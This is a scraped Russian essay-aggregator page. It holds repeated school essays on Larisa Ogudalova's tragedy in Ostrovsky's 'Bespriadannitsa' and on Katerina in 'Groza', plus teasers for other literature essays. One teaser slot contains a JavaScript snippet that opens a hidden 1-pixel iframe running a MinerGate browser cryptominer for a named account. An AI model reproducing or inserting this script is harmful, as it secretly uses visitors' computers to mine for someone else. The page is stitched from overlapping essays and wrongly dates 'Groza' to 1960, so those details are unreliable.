Почему так трагически сложилась судьба ларисы. Трагическая судьба Ларисы в «темном царстве» (по пьесе А. Н. Островского «Бесприданница»). Трагедия Ларисы Огудаловой. Окружение Ларисы. Место женщины в сложном мире

Лариса Огудалова — главная героиня пьесы А. Н. Островского «Бесприданница», которая впервые была напечатана в «Отечественных записках» в 1879 году. В драматургии Островского 70—80-х годов основной становится тема власти денег, собственности, богатства в эпоху «торжества буржуазии». Драматург продолжает искать в русской жизни силы, которые могли бы противостоять стихии безудержного хищничества, унижения человеческого достоинства, холодного расчета и эгоизма. Особенно чувствуется тревога писателя за судьбу человека «с горячим сердцем», который и в это расчетливое время продолжает жить чувством, ищет любви, понимания, счастья. Такова и героиня пьесы «Бесприданница».

В Ларисе есть все — ум, талант, красота, чувствительность. Она чиста душой и бескорыстна. Она тянется к людям, верит им, надеется на понимание и ответное чувство. Но Лариса — бесприданница, и это предопределяет ее трагическую судьбу.

Мать Ларисы стремится повыгоднее выдать дочь замуж, она пытается научить Ларису жить по правилам, которые диктует время, заставляя дочь лгать, любезничать с молодыми людьми побогаче. Но героиня пьесы не может действовать по расчету. Она отдает свое сердце Сергею Сергеевичу Паратову, красивому, умному и сильному. Но Паратов — человек своего времени, живущий по принципу: «Всякому товару цена есть». Лариса для него — тоже товар. И он не готов заплатить своим материальным благополучием за любовь и счастье. Паратов женится на богатой невесте, вернее, на золотых приисках, которые дают ей в приданое.

Не найдя любви, Лариса пытается жить, «как все». Она решается выйти замуж за бедного Чиновника Юлия Капитоновича Карандышева. В своем избраннике Лариса ищет черты, достойные уважения: «Я мужа своего хоть уважать должна», — говорит она. Но уважать Карандышева трудно. В своих тщеславных попытках сравниться с Кнуровым и Вожеватовым он выглядит смешным и жалким. Он не слышит мольбу Ларисы о том, чтобы уехать в деревню, где она надеется найти хотя бы душевный покой. Юлию Капитоновичу важнее «в свою очередь посмеяться» над теми, чьи унижения он терпел три года. Ему не до терзаний Ларисы!

После разрыва с Карандышевым, после обмана Паратова Лариса ищет простого человеческого сочувствия, обращаясь к другу детства Вожеватову: «Ну хоть поплачь со мной», — просит она его. Однако Вожеватов уже проиграл в орлянку Кнурову возможность влиять на судьбу Ларисы. «Не могу, ничего не могу», — таков ответ Вожеватова Ларисе. Материал с сайта

Не найдя ни любви, ни уважения, ни простого сострадания и понимания, Лариса теряет смысл жизни. Она с горечью говорит: «На меня смотрели и смотрят как на забаву. Никогда никто не постарался заглянуть ко мне в душу, ни от кого я не видела сочувствия, не слыхала теплого, сердечного слова. А ведь так жить холодно».

Выстрел Карандышева становится для нее избавлением от душевных мук, от пошлой жизни «вещи», игрушки в руках тех, кто может за нее заплатить. «Умереть, пока еще упрекнуть себя не в чем», — это лучшее, что остается «горячему сердцу» в мире расчета и тщеславия.

В этом личная трагедия Ларисы. Но это и трагедия общества, где правят деньги и счастье человека измеряется только их количеством.

Не нашли то, что искали? Воспользуйтесь поиском

На этой странице материал по темам:

  • трагедия ларисы бесприданница
  • чем трагизм судьбы ларисы огудаловой
  • сообщение на тему в чём трагедия ларисы
  • островский бесприданница в чем трагедия огудаловой
  • какой могла бы быть судьба ларисы в бесприданнице

Лариса Огудалова - героиня романса

островский пьеса женский национальный

Лариса Огудалова - образ не менее известный, чем Катерина Кабанова, и вызывает не меньшую полемику. Основным вопросом остается вопрос о силе нравственности Ларисы и о смысле ее последних слов. Островский создал действительно противоречивый образ, в данной части работы мы попытаемся найти ответ на вопрос, в чем заключается истинная сила характера Ларисы Огудаловой, и почему она, столь непохожая на чистую духовно Катерину, также остается воплощением женской трагедии.

Современное понимание этого образа во многом строится на восприятии фильма известного фильма «Жестокий романс», спорить о соответствии режиссерской версии и авторского замысла мы не станем, но нам кажется, что название фильма очень точно отражает стилистику пьесы. По определению, жестокий романс - это городская баллада о любви, наполненная преувеличенным трагическим пафосом, сентиментальная, но не дающая ощущения катарсиса, этот трагический пафос присущ всем главным героям пьесы, кроме самой Ларисы, которая взлетает как чайка - птица, давшая корень ее имени - над духовно мелкими людьми. «Бесприданница» - это пьеса о быте и нравах, но в ней нет такого прорыва, который мы находим в «Грозе». Гибель Ларисы - не предрешенная самой Ларисой данность, а результат мгновенного выбора героини, которая до последнего момента находится в плену собственных иллюзий, именно поэтому ее смерть - не самоубийство, а выстрел Карандышева. Лотман, в статье «Островский и русская драматургия его времени» так оценивает трагедию Ларисы Огудаловой, героиня: «современная женщина, ощущающая себя личностью, самостоятельно принимающая важные жизненные решения, сталкивается с жестокими законами общества и не может ни примириться с ними, ни противопоставить им новые идеалы. Находясь под обаянием сильного человека, яркой личности, она не сразу осознает, что обаяние его неотделимо от могущества, которое ему придает богатство, и от беспощадной жестокости «собирателя капиталов». Смерть Ларисы -- трагический выход из неразрешимых нравственных противоречий времени».

Пьеса «Бесприданница» написана в конце 70-х годов XIX века, во время торжества нуворишей -- разбогатевших купцов, когда все большее влияние на людей оказывали деньги, заслонившие подлинные ценности. Трагические последствия этого отразились в судьбе главной героини драмы. Лариса -- мягкая, чистая девушка, но воспитана она в лучших европейских традициях - ее научили тому, что полагается иметь европейской девушке: хорошие манеры и музыкальное образование. Но Лариса не понимает истинного смысла этого образования, которое является лишь красивой оправой для ценной вещи. Ее мать, удачно «пристроившая» уже двух дочерей, ни одна из которых не обрела счастья, прочит и Ларисе удачный брак с обеспеченным человеком. Действует Огудалова старшая отнюдь не во благо дочери, в этом мире наживы трагедия начинается уже с того, что мать пытается подороже продать дочь, для собственной выгоды.

Лариса лишена материнской любви, она лишена любви вообще, как и Катерина, и ее сердце требует того, чтобы этот недостаток любви был восполнен. Здесь она ближе к образу Татьяны Лариной, душа которой ждала «кого-нибудь», но в отличие от Татьяны, история которой завершается браком пусть и с нелюбимым, но с уважаемым ею и обществом человеком, который Татьяну любит, Лариса не получает заслуженной любви ни от своего избранника Паратова, ни от своего жениха Карандышева.

Лариса, наивная молодая девушка, никак не может поверить, что в обществе, где она, по воле матери, должна вращаться, все определяют деньги. «Она воплощает традиции дворянского воспитания, и в ее характере проявляется резкое противоречие между стремлением к внешнему блеску, к показному благородству жизни и более глубокими, внутренними свойствами ее натуры -- серьезностью, правдивостью и жаждой неподдельных и искренних отношений. Подобное противоречие было тогда явлением, встречающимся в жизни лучших представителен привилегированных слоев общества». Умом, конечно же, она все прекрасно знает, судьба сестер - наглядное тому доказательство, но вот душа ее никак не может это принять. Удивительно, как в этой семье выросла такая чистая и жаждущая любви девушка, которая стремится к подлинному возвышенному чувству, и, как ей кажется, находит его в лице «блестящего барина» Сергея Сергеевича Паратова. Женщина пылкого сердца, Лариса ищет любви, в ней нет никакого расчета, пошлости: «Ведь в Ларисе Дмитриевне земного, этого житейского, нет» -- замечает Кнуров. Она ищет возвышенно-красивой любви, изящно-красивой жизни. Лариса слепо уверена в том, что Паратов любит ее так же искренне и безоглядно, как она его, и в этом заключена ее трагедия. Катерину и Ларису объединяет то, что обе они способны наделить своего избранника несуществующей духовной красотой, но если Катерина знает о своей ошибке, хотя и прячет это знание, то Лариса не видит, что это только в ее мире Паратов обладает чертами идеального человека, который способен на любовь.

«Но избранник Ларисы, не обладая деловой хваткой купцов Кнурова и Вожеватова, уже успел вполне усвоить их мораль, не случайно он признается Кнурову: «У меня, Мокий Парменыч, ничего заветного нет; найду выгоду, так все продам, что угодно». Лариса же так рисует себе и Карандышеву своего возлюбленного: «Сами по себе вы что-нибудь значите, вы хороший, честный человек; но от сравнения с Сергеем Сергеичем вы теряете все... Сергей Сергеич... это идеал мужчины». Мы не можем точно определить круг чтения Ларисы Огудаловой, но можем предположить, что воспитывалась она на романтических повестях, и оттуда она взяла свой идеал, воплощением которого видит Паратова: идеал мужественности, отваги, доблести и чести. Критически взглянуть на этогот мужчину Лариса не в состоянии: эпизод с кавказским офицером, когда Паратов, дабы продемонстрировать свое хладнокровие и меткость, стрелял в мишень, которую она держала в руке, она воспринимает как доказательство его «идеальности», так похожей на «идеальность» романтических героев. Хотя на самом деле эпизод этот говорит только о бахвальстве и гордыни, ради которых Сергей Сергеич, не колеблясь, рискует и своей, и чужой жизнью.

На самом деле «идеальный мужчина» Сергей Сергеич - трус, и трус самого низкого пошиба, потому что боится остаться без капитала, и поэтому женится на богатой женщине, а его «вспышка страсти» к Ларисе - всего лишь игра с Карандышевым, которому Паратов таким безнравственным способом «указывает на место», превосходно все сознавал и точно рассчитывал свои действия. Лариса для него - красивая вещь, игрушка, которую вдруг отнял какой-то ничтожный Карандышев. Герониня пьесы компрометирует себя, уезжая с Паратовым, но она еще не осознает за собой греха, только после разговора с Сергеем Сергеевичем, она понимает, что ее любовь была иллюзией, выстроенной ею же самой. Лариса очарована, и живет в очарованном мире, который разрушается по ходу действия пьесы. В ней нет такой нравственной силы, как в Катерине, того духа прозрения, который позволил героине «Грозы» предчувствовать свой трагический финал, она разочаровывается не в мире, а пока только в возлюбленном. Она все еще верит, что мир вокруг нее хоть и жесток, но хотя бы не много похож на тот романтический мир, который она с таким упорством выстраивала.

На протяжении пьесы Лариса не растет духовно, она духовно прозревает, у нее открываются глаза, но внутреннего роста, как такового, не происходит, но причина этого вовсе не в отсутствии у Ларисы духовного начала, в Ларисе нет такой силы, которая способна сломать столь прочно утвердившуюся власть денег, она способна только уйти из этого мира в мир вымышленный, созданный свом воображением, но силы на борьбу у нее нет. В конечном итоге, сломленная предательством возлюбленного девушка, которой «открывается ложность идеала, во имя которого она готова была принести любые жертвы», и перед которой «во всей своей неприглядности обнаруживается положение, на которое она обречена -- роль дорогой вещи», решает стать содержанкой, чтобы снова попытаться выстроить вокруг некий «кокон», с помощью денег Кнурова выстроить если не красивую любовь, то хотя бы красивую жизнь. Можно обвинять Ларису в отсутствии духовного начала, ведь такое решение аморально, и сама она говорит, что «золото заблистало перед ней», но это решение - решение принятое в полном отчаянии, и оно в ее сознании равносильно желанию умереть. Она понимает, что ее ждет духовная смерть и колеблется между смертью тела и смертью души. К трагической развязке приводит осознание Ларисой того, что все вокруг рассматривают ее как дорогую красивую вещь, которую можно купить. Она произносит горькие слова: «Вещь... да, вещь! Они правы, я вещь, а не человек... Всякая вещь должна иметь хозяина, я пойду к хозяину». ощущая себя вещью, Лариса на миг отказывается от всех своих душевных качеств, но они проявляют себя: девушка не может стать простой содержанкой, игрушкой, к которой не испытывают любви, и которая не испытывает любви сама.

Когда Лариса впервые говорит о самоубийстве, она всего лишь провоцирует Паратова принять решение, как казалось Ларисе, благоприятное для нее: «Для несчастных людей много простора в Божьем мире: вот сад, вот Волга. Здесь на каждом сучке удавиться можно, на Волге -- выбирай любое место. Везде утопиться легко, если есть желание да сил достанет», она еще всерьез не думает о самоубийстве. Слова о Волге и саде призваны скорее напугать возлюбленного, но Кнуров предлагает ей стать содержанкой, со значением подчеркивая: «Для меня невозможно мало», мысли о смерти становятся реальными. Лариса размышляет: «Расставаться с жизнью совсем не так просто, как я думала. Вот и нет сил! Вот я какая несчастная! А ведь есть люди, для которых это легко... Ах, что я!... да ведь и мне ничто не мило, и мне жить незачем! Что ж я не решаюсь? Что меня держит над этой пропастью? Что мешает? Ах, нет, нет... Не Кнуров, роскошь, блеск... нет, нет... я должна от суеты... Разврат... ох, нет... Просто решимости не имею. Жалкая слабость: жить, хоть как-нибудь, да жить... Когда нельзя жить и не нужно. Какая я жалкая, несчастная.. Кабы теперь меня убил кто-нибудь... Как хорошо умереть... Пока еще упрекнуть себя не в чем. Или захворать и умереть... Да я, кажется, захвораю. Как дурно мне!.. Хворать долго, успокоишься, со всем примиришься, всем простишь и умрешь... Ах, как дурно, как кружиться голова».

Даже перспектива красивой жизни не утешает Ларису, она произносит слово «разврат», а значит она осознает чудовищность перспективы, предложенной Кнуровым, а значит духовное начало в ней сильно. До момента прозрения Лариса жила любовью, которая в ней была сильнее понятий о морали и нравственности, тем более что подобные понятия не были приоритетными при ее воспитании; теперь же, она чувствует в себе нравственный закон, не связанный с религией, как у Катерины, а связанный с ее пониманием «идеального», которое, как оказалось, неотделимо от нравственного.

Когда Карандышев рассказывает невесте, что Кнуров и Вожеватов разыгрывали ее в орлянку, в душе Ларисы происходит трагический надлом, больше она не сможет выстраивать вокруг себя иллюзий - реальный мир оказался сильнее ее воображения, жить в этом мире она больше не сможет. Карандышев, для которого жена, вхожая в круг местных миллионеров, должна была стать средством преодоления собственного комплекса неполноценности, помогает Ларисе, сам того не сознавая, осуществить ее сокровенное желание: «Кабы теперь Меня убил кто-нибудь...», - спасает ее, позволяет ей уйти, не запятнав души и тела развратом, не сделав собственную красоту товаром. За минуту до смерти она проявляет подлинное благородство, спасая своего убийцу от суда, убеждая столпившихся вокруг нее Паратова, Кнурова, Вожеватова - истинных виновников ее гибели в том, что совершила самоубийство. Хотя возможно и иначе истолковать ее слова: хочется верить в фантастическую идею о том, что Лариса силой своей души все-таки может воздействовать на мир, и это ее решимость, а не выстрел Карандышева, позволяют ей умереть… «Это я сама... Никто не виновен, никто... Это я сама».

«Паратов исступленно кричит поющим цыганам: «Велите замолчать! Велите замолчать!» - но у умирающей Ларисы хватает сил с иронией оспорить паратовское распоряжение: «Нет, нет, зачем!.. Пусть веселятся, кому весело, кому весело... Я не хочу мешать никому. Живите, живите все! Вам надо жить, а мне надо... умереть. Я ни на кого не жалуюсь, ни на кого не обижаюсь... вы все хорошие люди...» ее жизнь заканчивается глубоко искренним признанием: «Я вас всех... всех, люблю», - ее мир торжествует, все-таки она смогла, через боль, через разочарование обрести такую духовную силу, взойти на такую вершину, что она от всего сердца даровала миру жестокости и наживы прощение и поцелуй.

Лариса в конечном итоге оказалась столь же сильна, как и Катерина, пусть она ничего не изменила в мире, но она смогла простить мир. Девушка - птица в итоге обретает могилу все в той же Волге, то есть становится свободной. Истинная сила характера Ларисы Огудаловой - в ее способности любить и прощать, в ее самоотверженности, в наивной вере в мир. Какая еще героиня способна также слепо верить в любовь в мире, где власть принадлежит деньгам? Разве не сильна эта девушка, которая перед самой смертью за несколько коротких часов переживает разочарование в любви, в мире, в себе самой, но может уйти из жизни, послав миру воздушный поцелуй? Мир не изменится, цыганский хор поет, и Лариса не требует прерывать веселья этого «праздника жизни», она просто уходит, уходит с чистой душой и с чистым, не омраченным ненавистью сердцем. Думается, в этом и есть ее истинная сила.

Героями пьес Островского чаще всего становятся женщины. Безусловно, эти женщины являются незаурядными и неординарными личностями. Достаточно вспомнить героиню драмы Гроза Катерину. Она настолько эмоциональна, впечатлительна, что особняком стоит среди других героев пьесы. Судьба Катерины чем-то похожа на судьбу другой героини Островского. В данном случае речь идет о пьесе Бесприданница.

Ларисе Огудаловой пришлось испытать равнодушие и жестокость окружающих, пережить любовную драму, и в результате она гибнет, так же как и героиня Грозы. Но при кажущейся схожести Лариса Огудалова обладательница совсем иного характера, нежели Катерина Кабанова. Девушка получила великолепное образование. Она умна, утонченна, образованна, мечтает о красивой любви, но изначально ее жизнь складывается совсем иначе. Она бесприданница. Мать Ларисы очень корыстолюбива. Она торгует красотой и молодостью своих дочерей. Старшие сестры Ларисы уже пристроены благодаря заботам оборотистой родительницы, но, к сожалению, их жизнь складывается весьма и весьма трагично.

Лариса Огудалова влюбляется в блестящего барина Сергея Сергеевича Паратова. Она искренне считает его идеалом мужчины. Барин обладает состоянием, он полностью соответствует представлению о знатном и образованном человеке. Внутренняя сущность его раскрывается позже. Лариса молода, неопытна, поэтому она попадается в ловушку Паратова, губит себя. Она не обладает сильным характером и становится игрушкой в руках окружающих. Дело доходит до того, что девушку разыгрывают в орлянку. Окружающие считают ее вещью, дорогой и красивой забавой, а ее возвышенная душа, красота и талант оказываются не важны. Карандышев говорит Ларисе: Они не смотрят на вас, как на женщину, как на человека… они смотрят на вас, как на вещь.

Она сама соглашается с этим: Вещь… да, вещь! Они правы, я вещь, я не человек….

Лариса обладает пылким сердцем, она искренна и эмоциональна Она щедро дарит свою любовь, но что получает взаменДля своего любимого человека Лариса является очередным развлечением, забавой. От отчаяния она даже соглашается принять условия Кнурова.

Гибель является своего рода спасением для Ларисы, спасением духовным, разумеется. Столь трагичный финал спасает ее от тяжелого выбора, который она пытается сделать, спасает от нравственной гибели и падения в пропасть, именуемую развратом.

Драма А. Н. Островского «Гроза» была опубликована в 1960 году, накануне революционной ситуации в России. В произведении отразились впечатления от путешествия писателя по Волге летом 1856 года. Но не какой-то определенный волжский город и не какие-то конкретные лица изображены в «Грозе». Все свои наблюдения над жизнью Поволжья Островский переработал и превратил их в глубоко типичные картины русской жизни.

Жанр драмы характеризуется тем, что в ее основе лежит конфликт отдельной личности и окружающего общества. В «Грозе» эта личность – Катерина Кабанова.

Катерина олицетворяет нравственную чистоту, душевную красоту русской женщины, ее стремление к воле, к свободе, ее способность не только терпеть, но и отстаивать свои права, свое человеческое достоинство. По словам Добролюбова, она «не убила в себе человеческую природу».

Катерина – русский национальный характер. Прежде всего, это отражено Островским, владевшим в совершенстве всеми богатствами народного языка, в речи героини. Когда она говорит, кажется, что она поет. В речи Катерины, связанной с простым на родом, воспитанной на его устной поэзии, преобладает разговорно-просторечная лексика, отличающаяся высокой поэтичностью, образностью, эмоциональностью. Читатель чувствует музыкальность и напевность, говор Кати напоминает народные песни. Для языка островской героини характерны повторы («на тройке на хорошей», «и люди мне противны, и дом мне противен, и стены противны!»), обилие ласкательных и уменьшительных слов («солнышко», «водица», «могилушка»), сравнение («ни об чем не тужила, точно птичка на воле», «кто-то ласково говорит со мной, точно голубь воркует»). Тоскуя по Борису, в момент наибольшего напряжения душевных сил Катерина выражает свои чувства на языке народной поэзии, восклицая: «Ветры буйные, перенесите вы ему мою печаль-тоску!»

Поражает естественность, искренность, простота островской героини. «Обманывать-то я не умею; скрыть-то ничего не могу», – отвечает она Варваре, которая говорит, что без обману в их доме не проживешь. Взглянем на религиозность Катерины. Это не ханжество Кабанихи, а по-детски неподдельная вера в Бога. Она часто посещает церковь и делает это с удовольствием и наслаждением («И до смерти я любила в церковь ходить! Точно, бывало, я в рай войдуЕ»), любит рассказывать о странницах («У нас полон дом был странниц и богомолок»), сны Катерины о «храмах золотых».

Любовь островской героини небеспричинна. Во-первых, потребность любви дает о себе знать: ведь вряд ли ее муж Тихон под влиянием «маменьки» показывал свою любовь к жене очень часто. Во-вторых, оскорблены чувства жены и женщины. В-третьих, смертельная тоска однообразной жизни душит Катерину. И, наконец, четвертой причиной является желание воли, простора: ведь любовь есть одно из проявлений свободы. Катерина борется сама с собой, и в этом трагизм ее положения, однако в итоге она внутренне оправдывает себя. Кончая жизнь самоубийством, совершая, с точки зрения церкви, страшный грех, она думает не о спасении своей души, а о любви, которая открылась ей. «Друг мой! Радость моя! Прощай!» – вот последние слова Катерины.

Еще одна характерная черта островской героини – это «возмужалое, из глубины всего организма возникающее требование права и простора жизни», стремление к свободе, духовному раскрепощению. На слова Варвары: «Куда ты уйдешьТы мужняя жена» – Катерина отвечает: «Эх, Варя, не знаешь ты моего характеру! Конечно, не дай бог этому случиться! А уж коли мне здесь опостынет, так не удержат меня никакой силой. В окно выброшусь, в Волгу кинусь. Не хочу здесь жить, так не стану, хоть ты меня режь!» Не зря в пьесе неоднократно повторяется образ птицы – символ воли. Отсюда постоянный эпитет «вольная птица». Катерина, вспоминая о том, как ей жилось до замужества, сравнивает себя с птицей на воле. «Е Отчего люди не летают так, как птицы – говорит она Варваре. – Знаешь, мне иногда кажется, что я птица». Но вольная птица попала в железную клетку. И она бьется и тоскует в неволе.

Цельность, решительность характера Катерины выразилась в том, что она отказалась подчиниться распорядкам кабанихинского дома и предпочла жизни в неволе смерть. И это было проявлением не слабости, а духовной силы и смелости, горячей ненависти к гнету и деспотизму.

Итак, главное действующее лицо драмы «Гроза» вступает в конфликт с окружающей средой. В четвертом действии, в сцене покаяния, как будто наступает развязка. Все против Катерины в этой сцене: и «гроза господня», и проклинающая полусумасшедшая «барыня с двумя лакеями», и древняя картина на полуразрушенной стене, изображающая «геенну огненную». Бедную девушку все эти признаки уходящего, но такого живучего старого мира чуть не свели с ума, и она кается в своем грехе в полубреду, состоянии помрачения. Она сама позже признается Борису, что «в себе не вольна была», «себя не помнила». Если бы этой сценой заканчивалась драма «Гроза», то в ней была бы показана непобедимость «темного царства»: ведь в конце четвертого действия Кабаниха торжествует: «Что сынок! Куда воля-то ведет!»

Но драма завершается нравственной победой и над внешними силами, сковывавшими свободу Катерины, и над темными представлениями, сковывавшими ее волю и разум. И ее решение умереть, лишь бы не остаться рабой, выражает, по Добролюбову, «потребность возникшего движения русской жизни».

Трагическая судьба Ларисы в «темном царстве» (по пьесе А. Н. Островского «Бесприданница»)

Героями пьес Островского чаще всего становятся женщины. Безусловно, эти женщины являются незаурядными и неординарными личностями. Достаточно вспомнить героиню драмы “Гроза” Катерину. Она настолько эмоциональна, впечатлительна, что особняком стоит среди других героев пьесы. Судьба Катерины чем-то похожа на судьбу другой героини Островского

В данном случае речь идет о пьесе “Бесприданница”.
Ларисе Огудаловой пришлось испытать равнодушие и жестокость окружающих, пережить любовную драму, и в результате она гибнет, так же как и героиня “Грозы”. Но при кажущейся схожести Лариса Огудалова - обладательница совсем иного характера, нежели Катерина Кабанова. Девушка получила великолепное образование. Она умна, утонченна, образованна, мечтает о красивой любви, но изначально её жизнь складывается совсем иначе. Она бесприданница. Мать Ларисы очень корыстолюбива. Она торгует красотой и молодостью своих дочерей. Старшие сестры Ларисы уже “пристроены” благодаря заботам оборотистой родительницы, но, к сожалению, их жизнь складывается весьма и весьма трагично.
Лариса Огудалова влюбляется в “блестящего барина” Сергея Сергеевича Параᴛᴏʙа. Она искренне считает его идеалом мужчины. Барин обладает состоянием, он полностью соответствует представлению о знатном и образованном человеке. Внутренняя сущность его раскрывается позже. Лариса молода, неопытна, поэтому она попадается в ловушку Параᴛᴏʙа, губит себя. Она не обладает сильным характером и становится игрушкой в руках окружающих. Дело доходит до того, что девушку разыгрывают в орлянку. Окружающие считают её вещью, дорогой и красивой забавой, а её возвышенная душа, красота и талант оказываются не важны. Карандышев говорит Ларисе: “Они не смотрят на вас, как на женщину, как на человека... они смотрят на вас, как на вещь”.
Она сама соглашается с этим: “Вещь... да, вещь! Они правы, я вещь, я не человек...”.
Лариса обладает пылким сердцем, она искренна и эмоциональна Она щедро дарит свою любовь, но что получает взамен? Для своего любимого человека Лариса является очередным развлечением, забавой. От отчаяния она даже соглашается принять условия Кнурова.
Гибель является своего рода спасением для Ларисы, спасением духовным, разумеется. Столь трагичный финал спасает её от тяжелого выбора, который она пытается сделать, спасает от нравственной гибели и падения в пропасть, именуемую развратом.

Страница 1 из 1



Киноповесть «Украина в огне»: судьба народа сквозь призму авторского видения и оценки

(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//ru.minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/2/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body"); s.appendChild(w, s); })();...


Герои Отечественной войны в романе Гроссмана «Жизнь и судьба»

О Великой Отечественной войне написано очень много. Первые произведения о ней начали появляться уже в середине сороковых годов, и с тех пор романы, рассказы, стихи о войне издавались сплошным потоком. И многие среди них были, к сожалению, совершенно бездарны и нечитабельны.


Человеческая судьба и любовь к родной земле в творчестве А. Малышко

Андрей Самойлович Малышко - нерядовая фигура в истории украинской культуры. Его многогранный талант обнаружил себя в разных отраслях, но наиболее благосклонной к писателю была муза поэзии. В его наработке больше двух десятков сборников и семнадцати поэм, в которых автор охватывает огромные тематические горизонты. Но о человеке труда, человеке-патриоте, поэт пишет с особенным трепетом и душевным теплом. Родная земля в стихотворении «Родина» изображена как источник жизни, мудрости, красоты и материнской опеки. Она, как справедливо считает писатель, владеет какой-то магической силой, потому что те, кому дала «хлеб... с песнями соловья», приобретают природную мощь: ...


Трагическая судьба Тараса Шевченко

Как известно, Шевченко был сыном крестьянина-крепостного и сам был крепостным. Отец и мать великого поэта преждевременно умерли от непосильного труда, лишений и болезней. Такая же судьба ожидала Тараса Шевченко. Оставшись в одиннадцать лет круглой сиротой, он рано испытал непосильной тяжбы подневольного труда, почувствовал горе "бедного неулыбающегося мужика". Жил Шевченко в чрезвычайно жестких условиях, очень бедствовал, часто голодал и болел....


Тема революции, гражданской войны и судьба русской интеллегенции в русской литературе (Пастернак, Булгаков) Белая гвардия Булгаков М. А

Тема революции, гражданской войны и судьба русской интеллегенции в русской литературе (Пастернак, Булгаков) Необычно начало романа: "Шли и шли и пели "Вечную память"... Кого хоронят?.. "Живаго". На противопоставлении живого и мертвого строится все произведение Пастернака. Основным вопросом, вокруг которого вращается "внешняя и внутренняя" жизнь главных героев, является отношение к революции. Меньше всего и Юрий Живаго, и сам автор были ее противниками, меньше всего они спорили с ходом событий, сопротивлялись им. Их отношение к действительности совсем иное. Оно заключается в том, чтобы воспринимать историю такая, какая она есть, не вмешиваясь в нее, не пытаясь изменить ее. Такая позиция позволяет объективно увидеть происходящее. "Доктор вспомнил недавно минувшую осень, расстрел мятежников, детоубийство и женоубийство Палых, кровавую колошматину и человекоубоину, которой не привиделось конца. Изуверства белых и красных соперничали по жестокости, попеременно возрастая одно в ответ на другое, точно их перемножили". ...

Драма Островского «Бесприданница» показывает читателям трагедию Ларисы Огудаловой, ставшей безвольной игрушкой в руках окружающих. Лариса Огудалова, подобно Катерине Кабановой, главной героине другой драмы Островского, также становится жертвой. Однако Лариса обладает изначально другими качествами, чем Катерина, выросшая в патриархальной среде. Драма «Бесприданница» была написана в 1879 году. В это время в России уже установились капиталистические отношения. А значит, патриархальные устои постепенно утрачивают свою актуальность.

Лариса Огудалова получила хорошее образование. Она поевропейски утончена. Лариса мечтает о любви. Девушка обладает горячим сердцем. Она не может допустить, чтобы ее жизнь была связана с нелюбимым человеком. Но желание любви у Ларисы совпадает с мечтой и красивой жизни. Лариса бедна, но для того, чтобы стать счастливой, ей нужно и богатство.

Ларису окружают мелочные, неблагородные люди. Блестящий барин Паратов воспринимает Ларису только как красивую вещь. Этот вальяжный самовлюбленный человек кажется девушке воплощением идеала. Но на самом деле Паратов не обладает ни благородством, ни добротой. Он эгоистичен, мелочен, жесток, расчетлив.

Впрочем, Карандышев, который изначально не воспринимается как достойная пара для Ларисы, мало от него отличается. Лариса молода и неопытна. У нее нет сильного характера, чтобы противостоять сложившимся обстоятельствам. Она словно играет по чужим правилам, становится игрушкой в чужих руках. Даже мать Ларисы воспринимает свою дочь только как товар. Она готова пожертвовать красотой, молодостью Ларисы, поскольку это дает возможность получить материальную выгоду, упрочить социальное положение Огудаловых.

Все, кто окружает Ларису, думают о ней исключительно как о вещи, объекте развлечения. Не случайно ее разыгрывают в орлянку. Все лучшие качества Ларисы, ее душа, чувства никого не интересуют. Люди думают только о ее внешней красоте. Ведь именно делает ее столь привлекательной игрушкой.

Карандышев говорит Ларисе: «Они не смотрят на вас, как на женщину, как на человека... они смотрят на вас, как на вещь». Огудалова и сама соглашается с этим: «Вещь... да, вещь! Они правы, я вещь, я не человек...». На мой взгляд, главная трагедия девушки заключается именно в том, что Лариса обладает горячим сердцем. Если бы она была хладнокровной, расчетливой, хитрой, Ларисе при ее внешних данных и умении подать себя удалось бы совсем неплохо устроиться в жизни. Однако пылкость, эмоциональность, открытость героини заставляет ее сильнее страдать от той роли, которая ей отведена. Любовь, чувства Ларисы никого не интересуют, она нужна исключительно для развлечения. Девушка в финале драмы оказывается раздавленной, уничтоженной. Это приводит к тому, что отчаявшаяся Лариса даже соглашается принять условия Кнурова.

Трагичный финал «Бесприданницы» является спасением для героини, избавлением от унижения. Теперь она не принадлежит никому. Смерть представляется благом для Ларисы. Ведь униженная, несчастная, она не видит никакого смысла в дальнейшей жизни. Поступок Сергея Сергеевича Паратова заставляет девушку осознать тот страшный факт, что финал ее жизни будет неизбежно трагическим. Да, сейчас она еще нужна комуто помимо Сергея Паратова, но пройдут годы, молодость увянет и Лариса будет попросту выброшена кемнибудь из богатых содержателей, как изношенная и ставшая ненужной вещь.

Драма «Бесприданница» снова заставляет нас задуматься о месте женщины в мире. Если в пьесе «Гроза» Катерина стала жертвой домостроевского уклада жизни, то Лариса - жертва новых, капиталистических отношений. Примечательно, что правила, по которым живет общество, меняется. А женщина все также остается бесправным существом. Катерина Кабанова находит в себе силы для протеста. Ведь ее самоубийство - это явный протест против той действительности4 в которой выпало жить героине. Ларисе не хватает мужества сделать даже попытку протеста. Она до последнего остается игрушкой в руках обстоятельств. Возможно, всему причиной воспитание, которое получила Лариса Огудалова. Если вновь обратиться к образу Катерины из «Грозы», можно вспомнить, что эта девушка росла в атмосфере родительской любви и опеки. Поэтому она очень остро воспринимала свое нынешнее бесправное положение. Что же касается героини драмы «Бесприданница», то здесь, по всей видимости, Лариса изначально готовилась матерью именно к роли товара, игрушки. Отсюда и пассивность девушки, отсутствие желания бороться, отстаивать свои права.

Судьба Ларисы вызывает сожаление. Но вместе с тем невольно задумываешься, почему героиня, обладающая пылким сердцем, страстно желающая любить, не находит иного выхода своим страстям. Ведь она, получившая европеизированное воспитание, могла бы догадаться, что ее возлюбленный видит в ней только развлечение. Впрочем, Лариса была воспитана в такой атмосфере, что возможность выгодно продать себя, свою красоту и талант, казалась вполне приемлемой. Не случайно мать Ларисы изображена очень корыстолюбивой. Печально, что из всего окружения Ларисы нет никого, кто не был бы столь равнодушен и жесток к судьбе молодой девушки.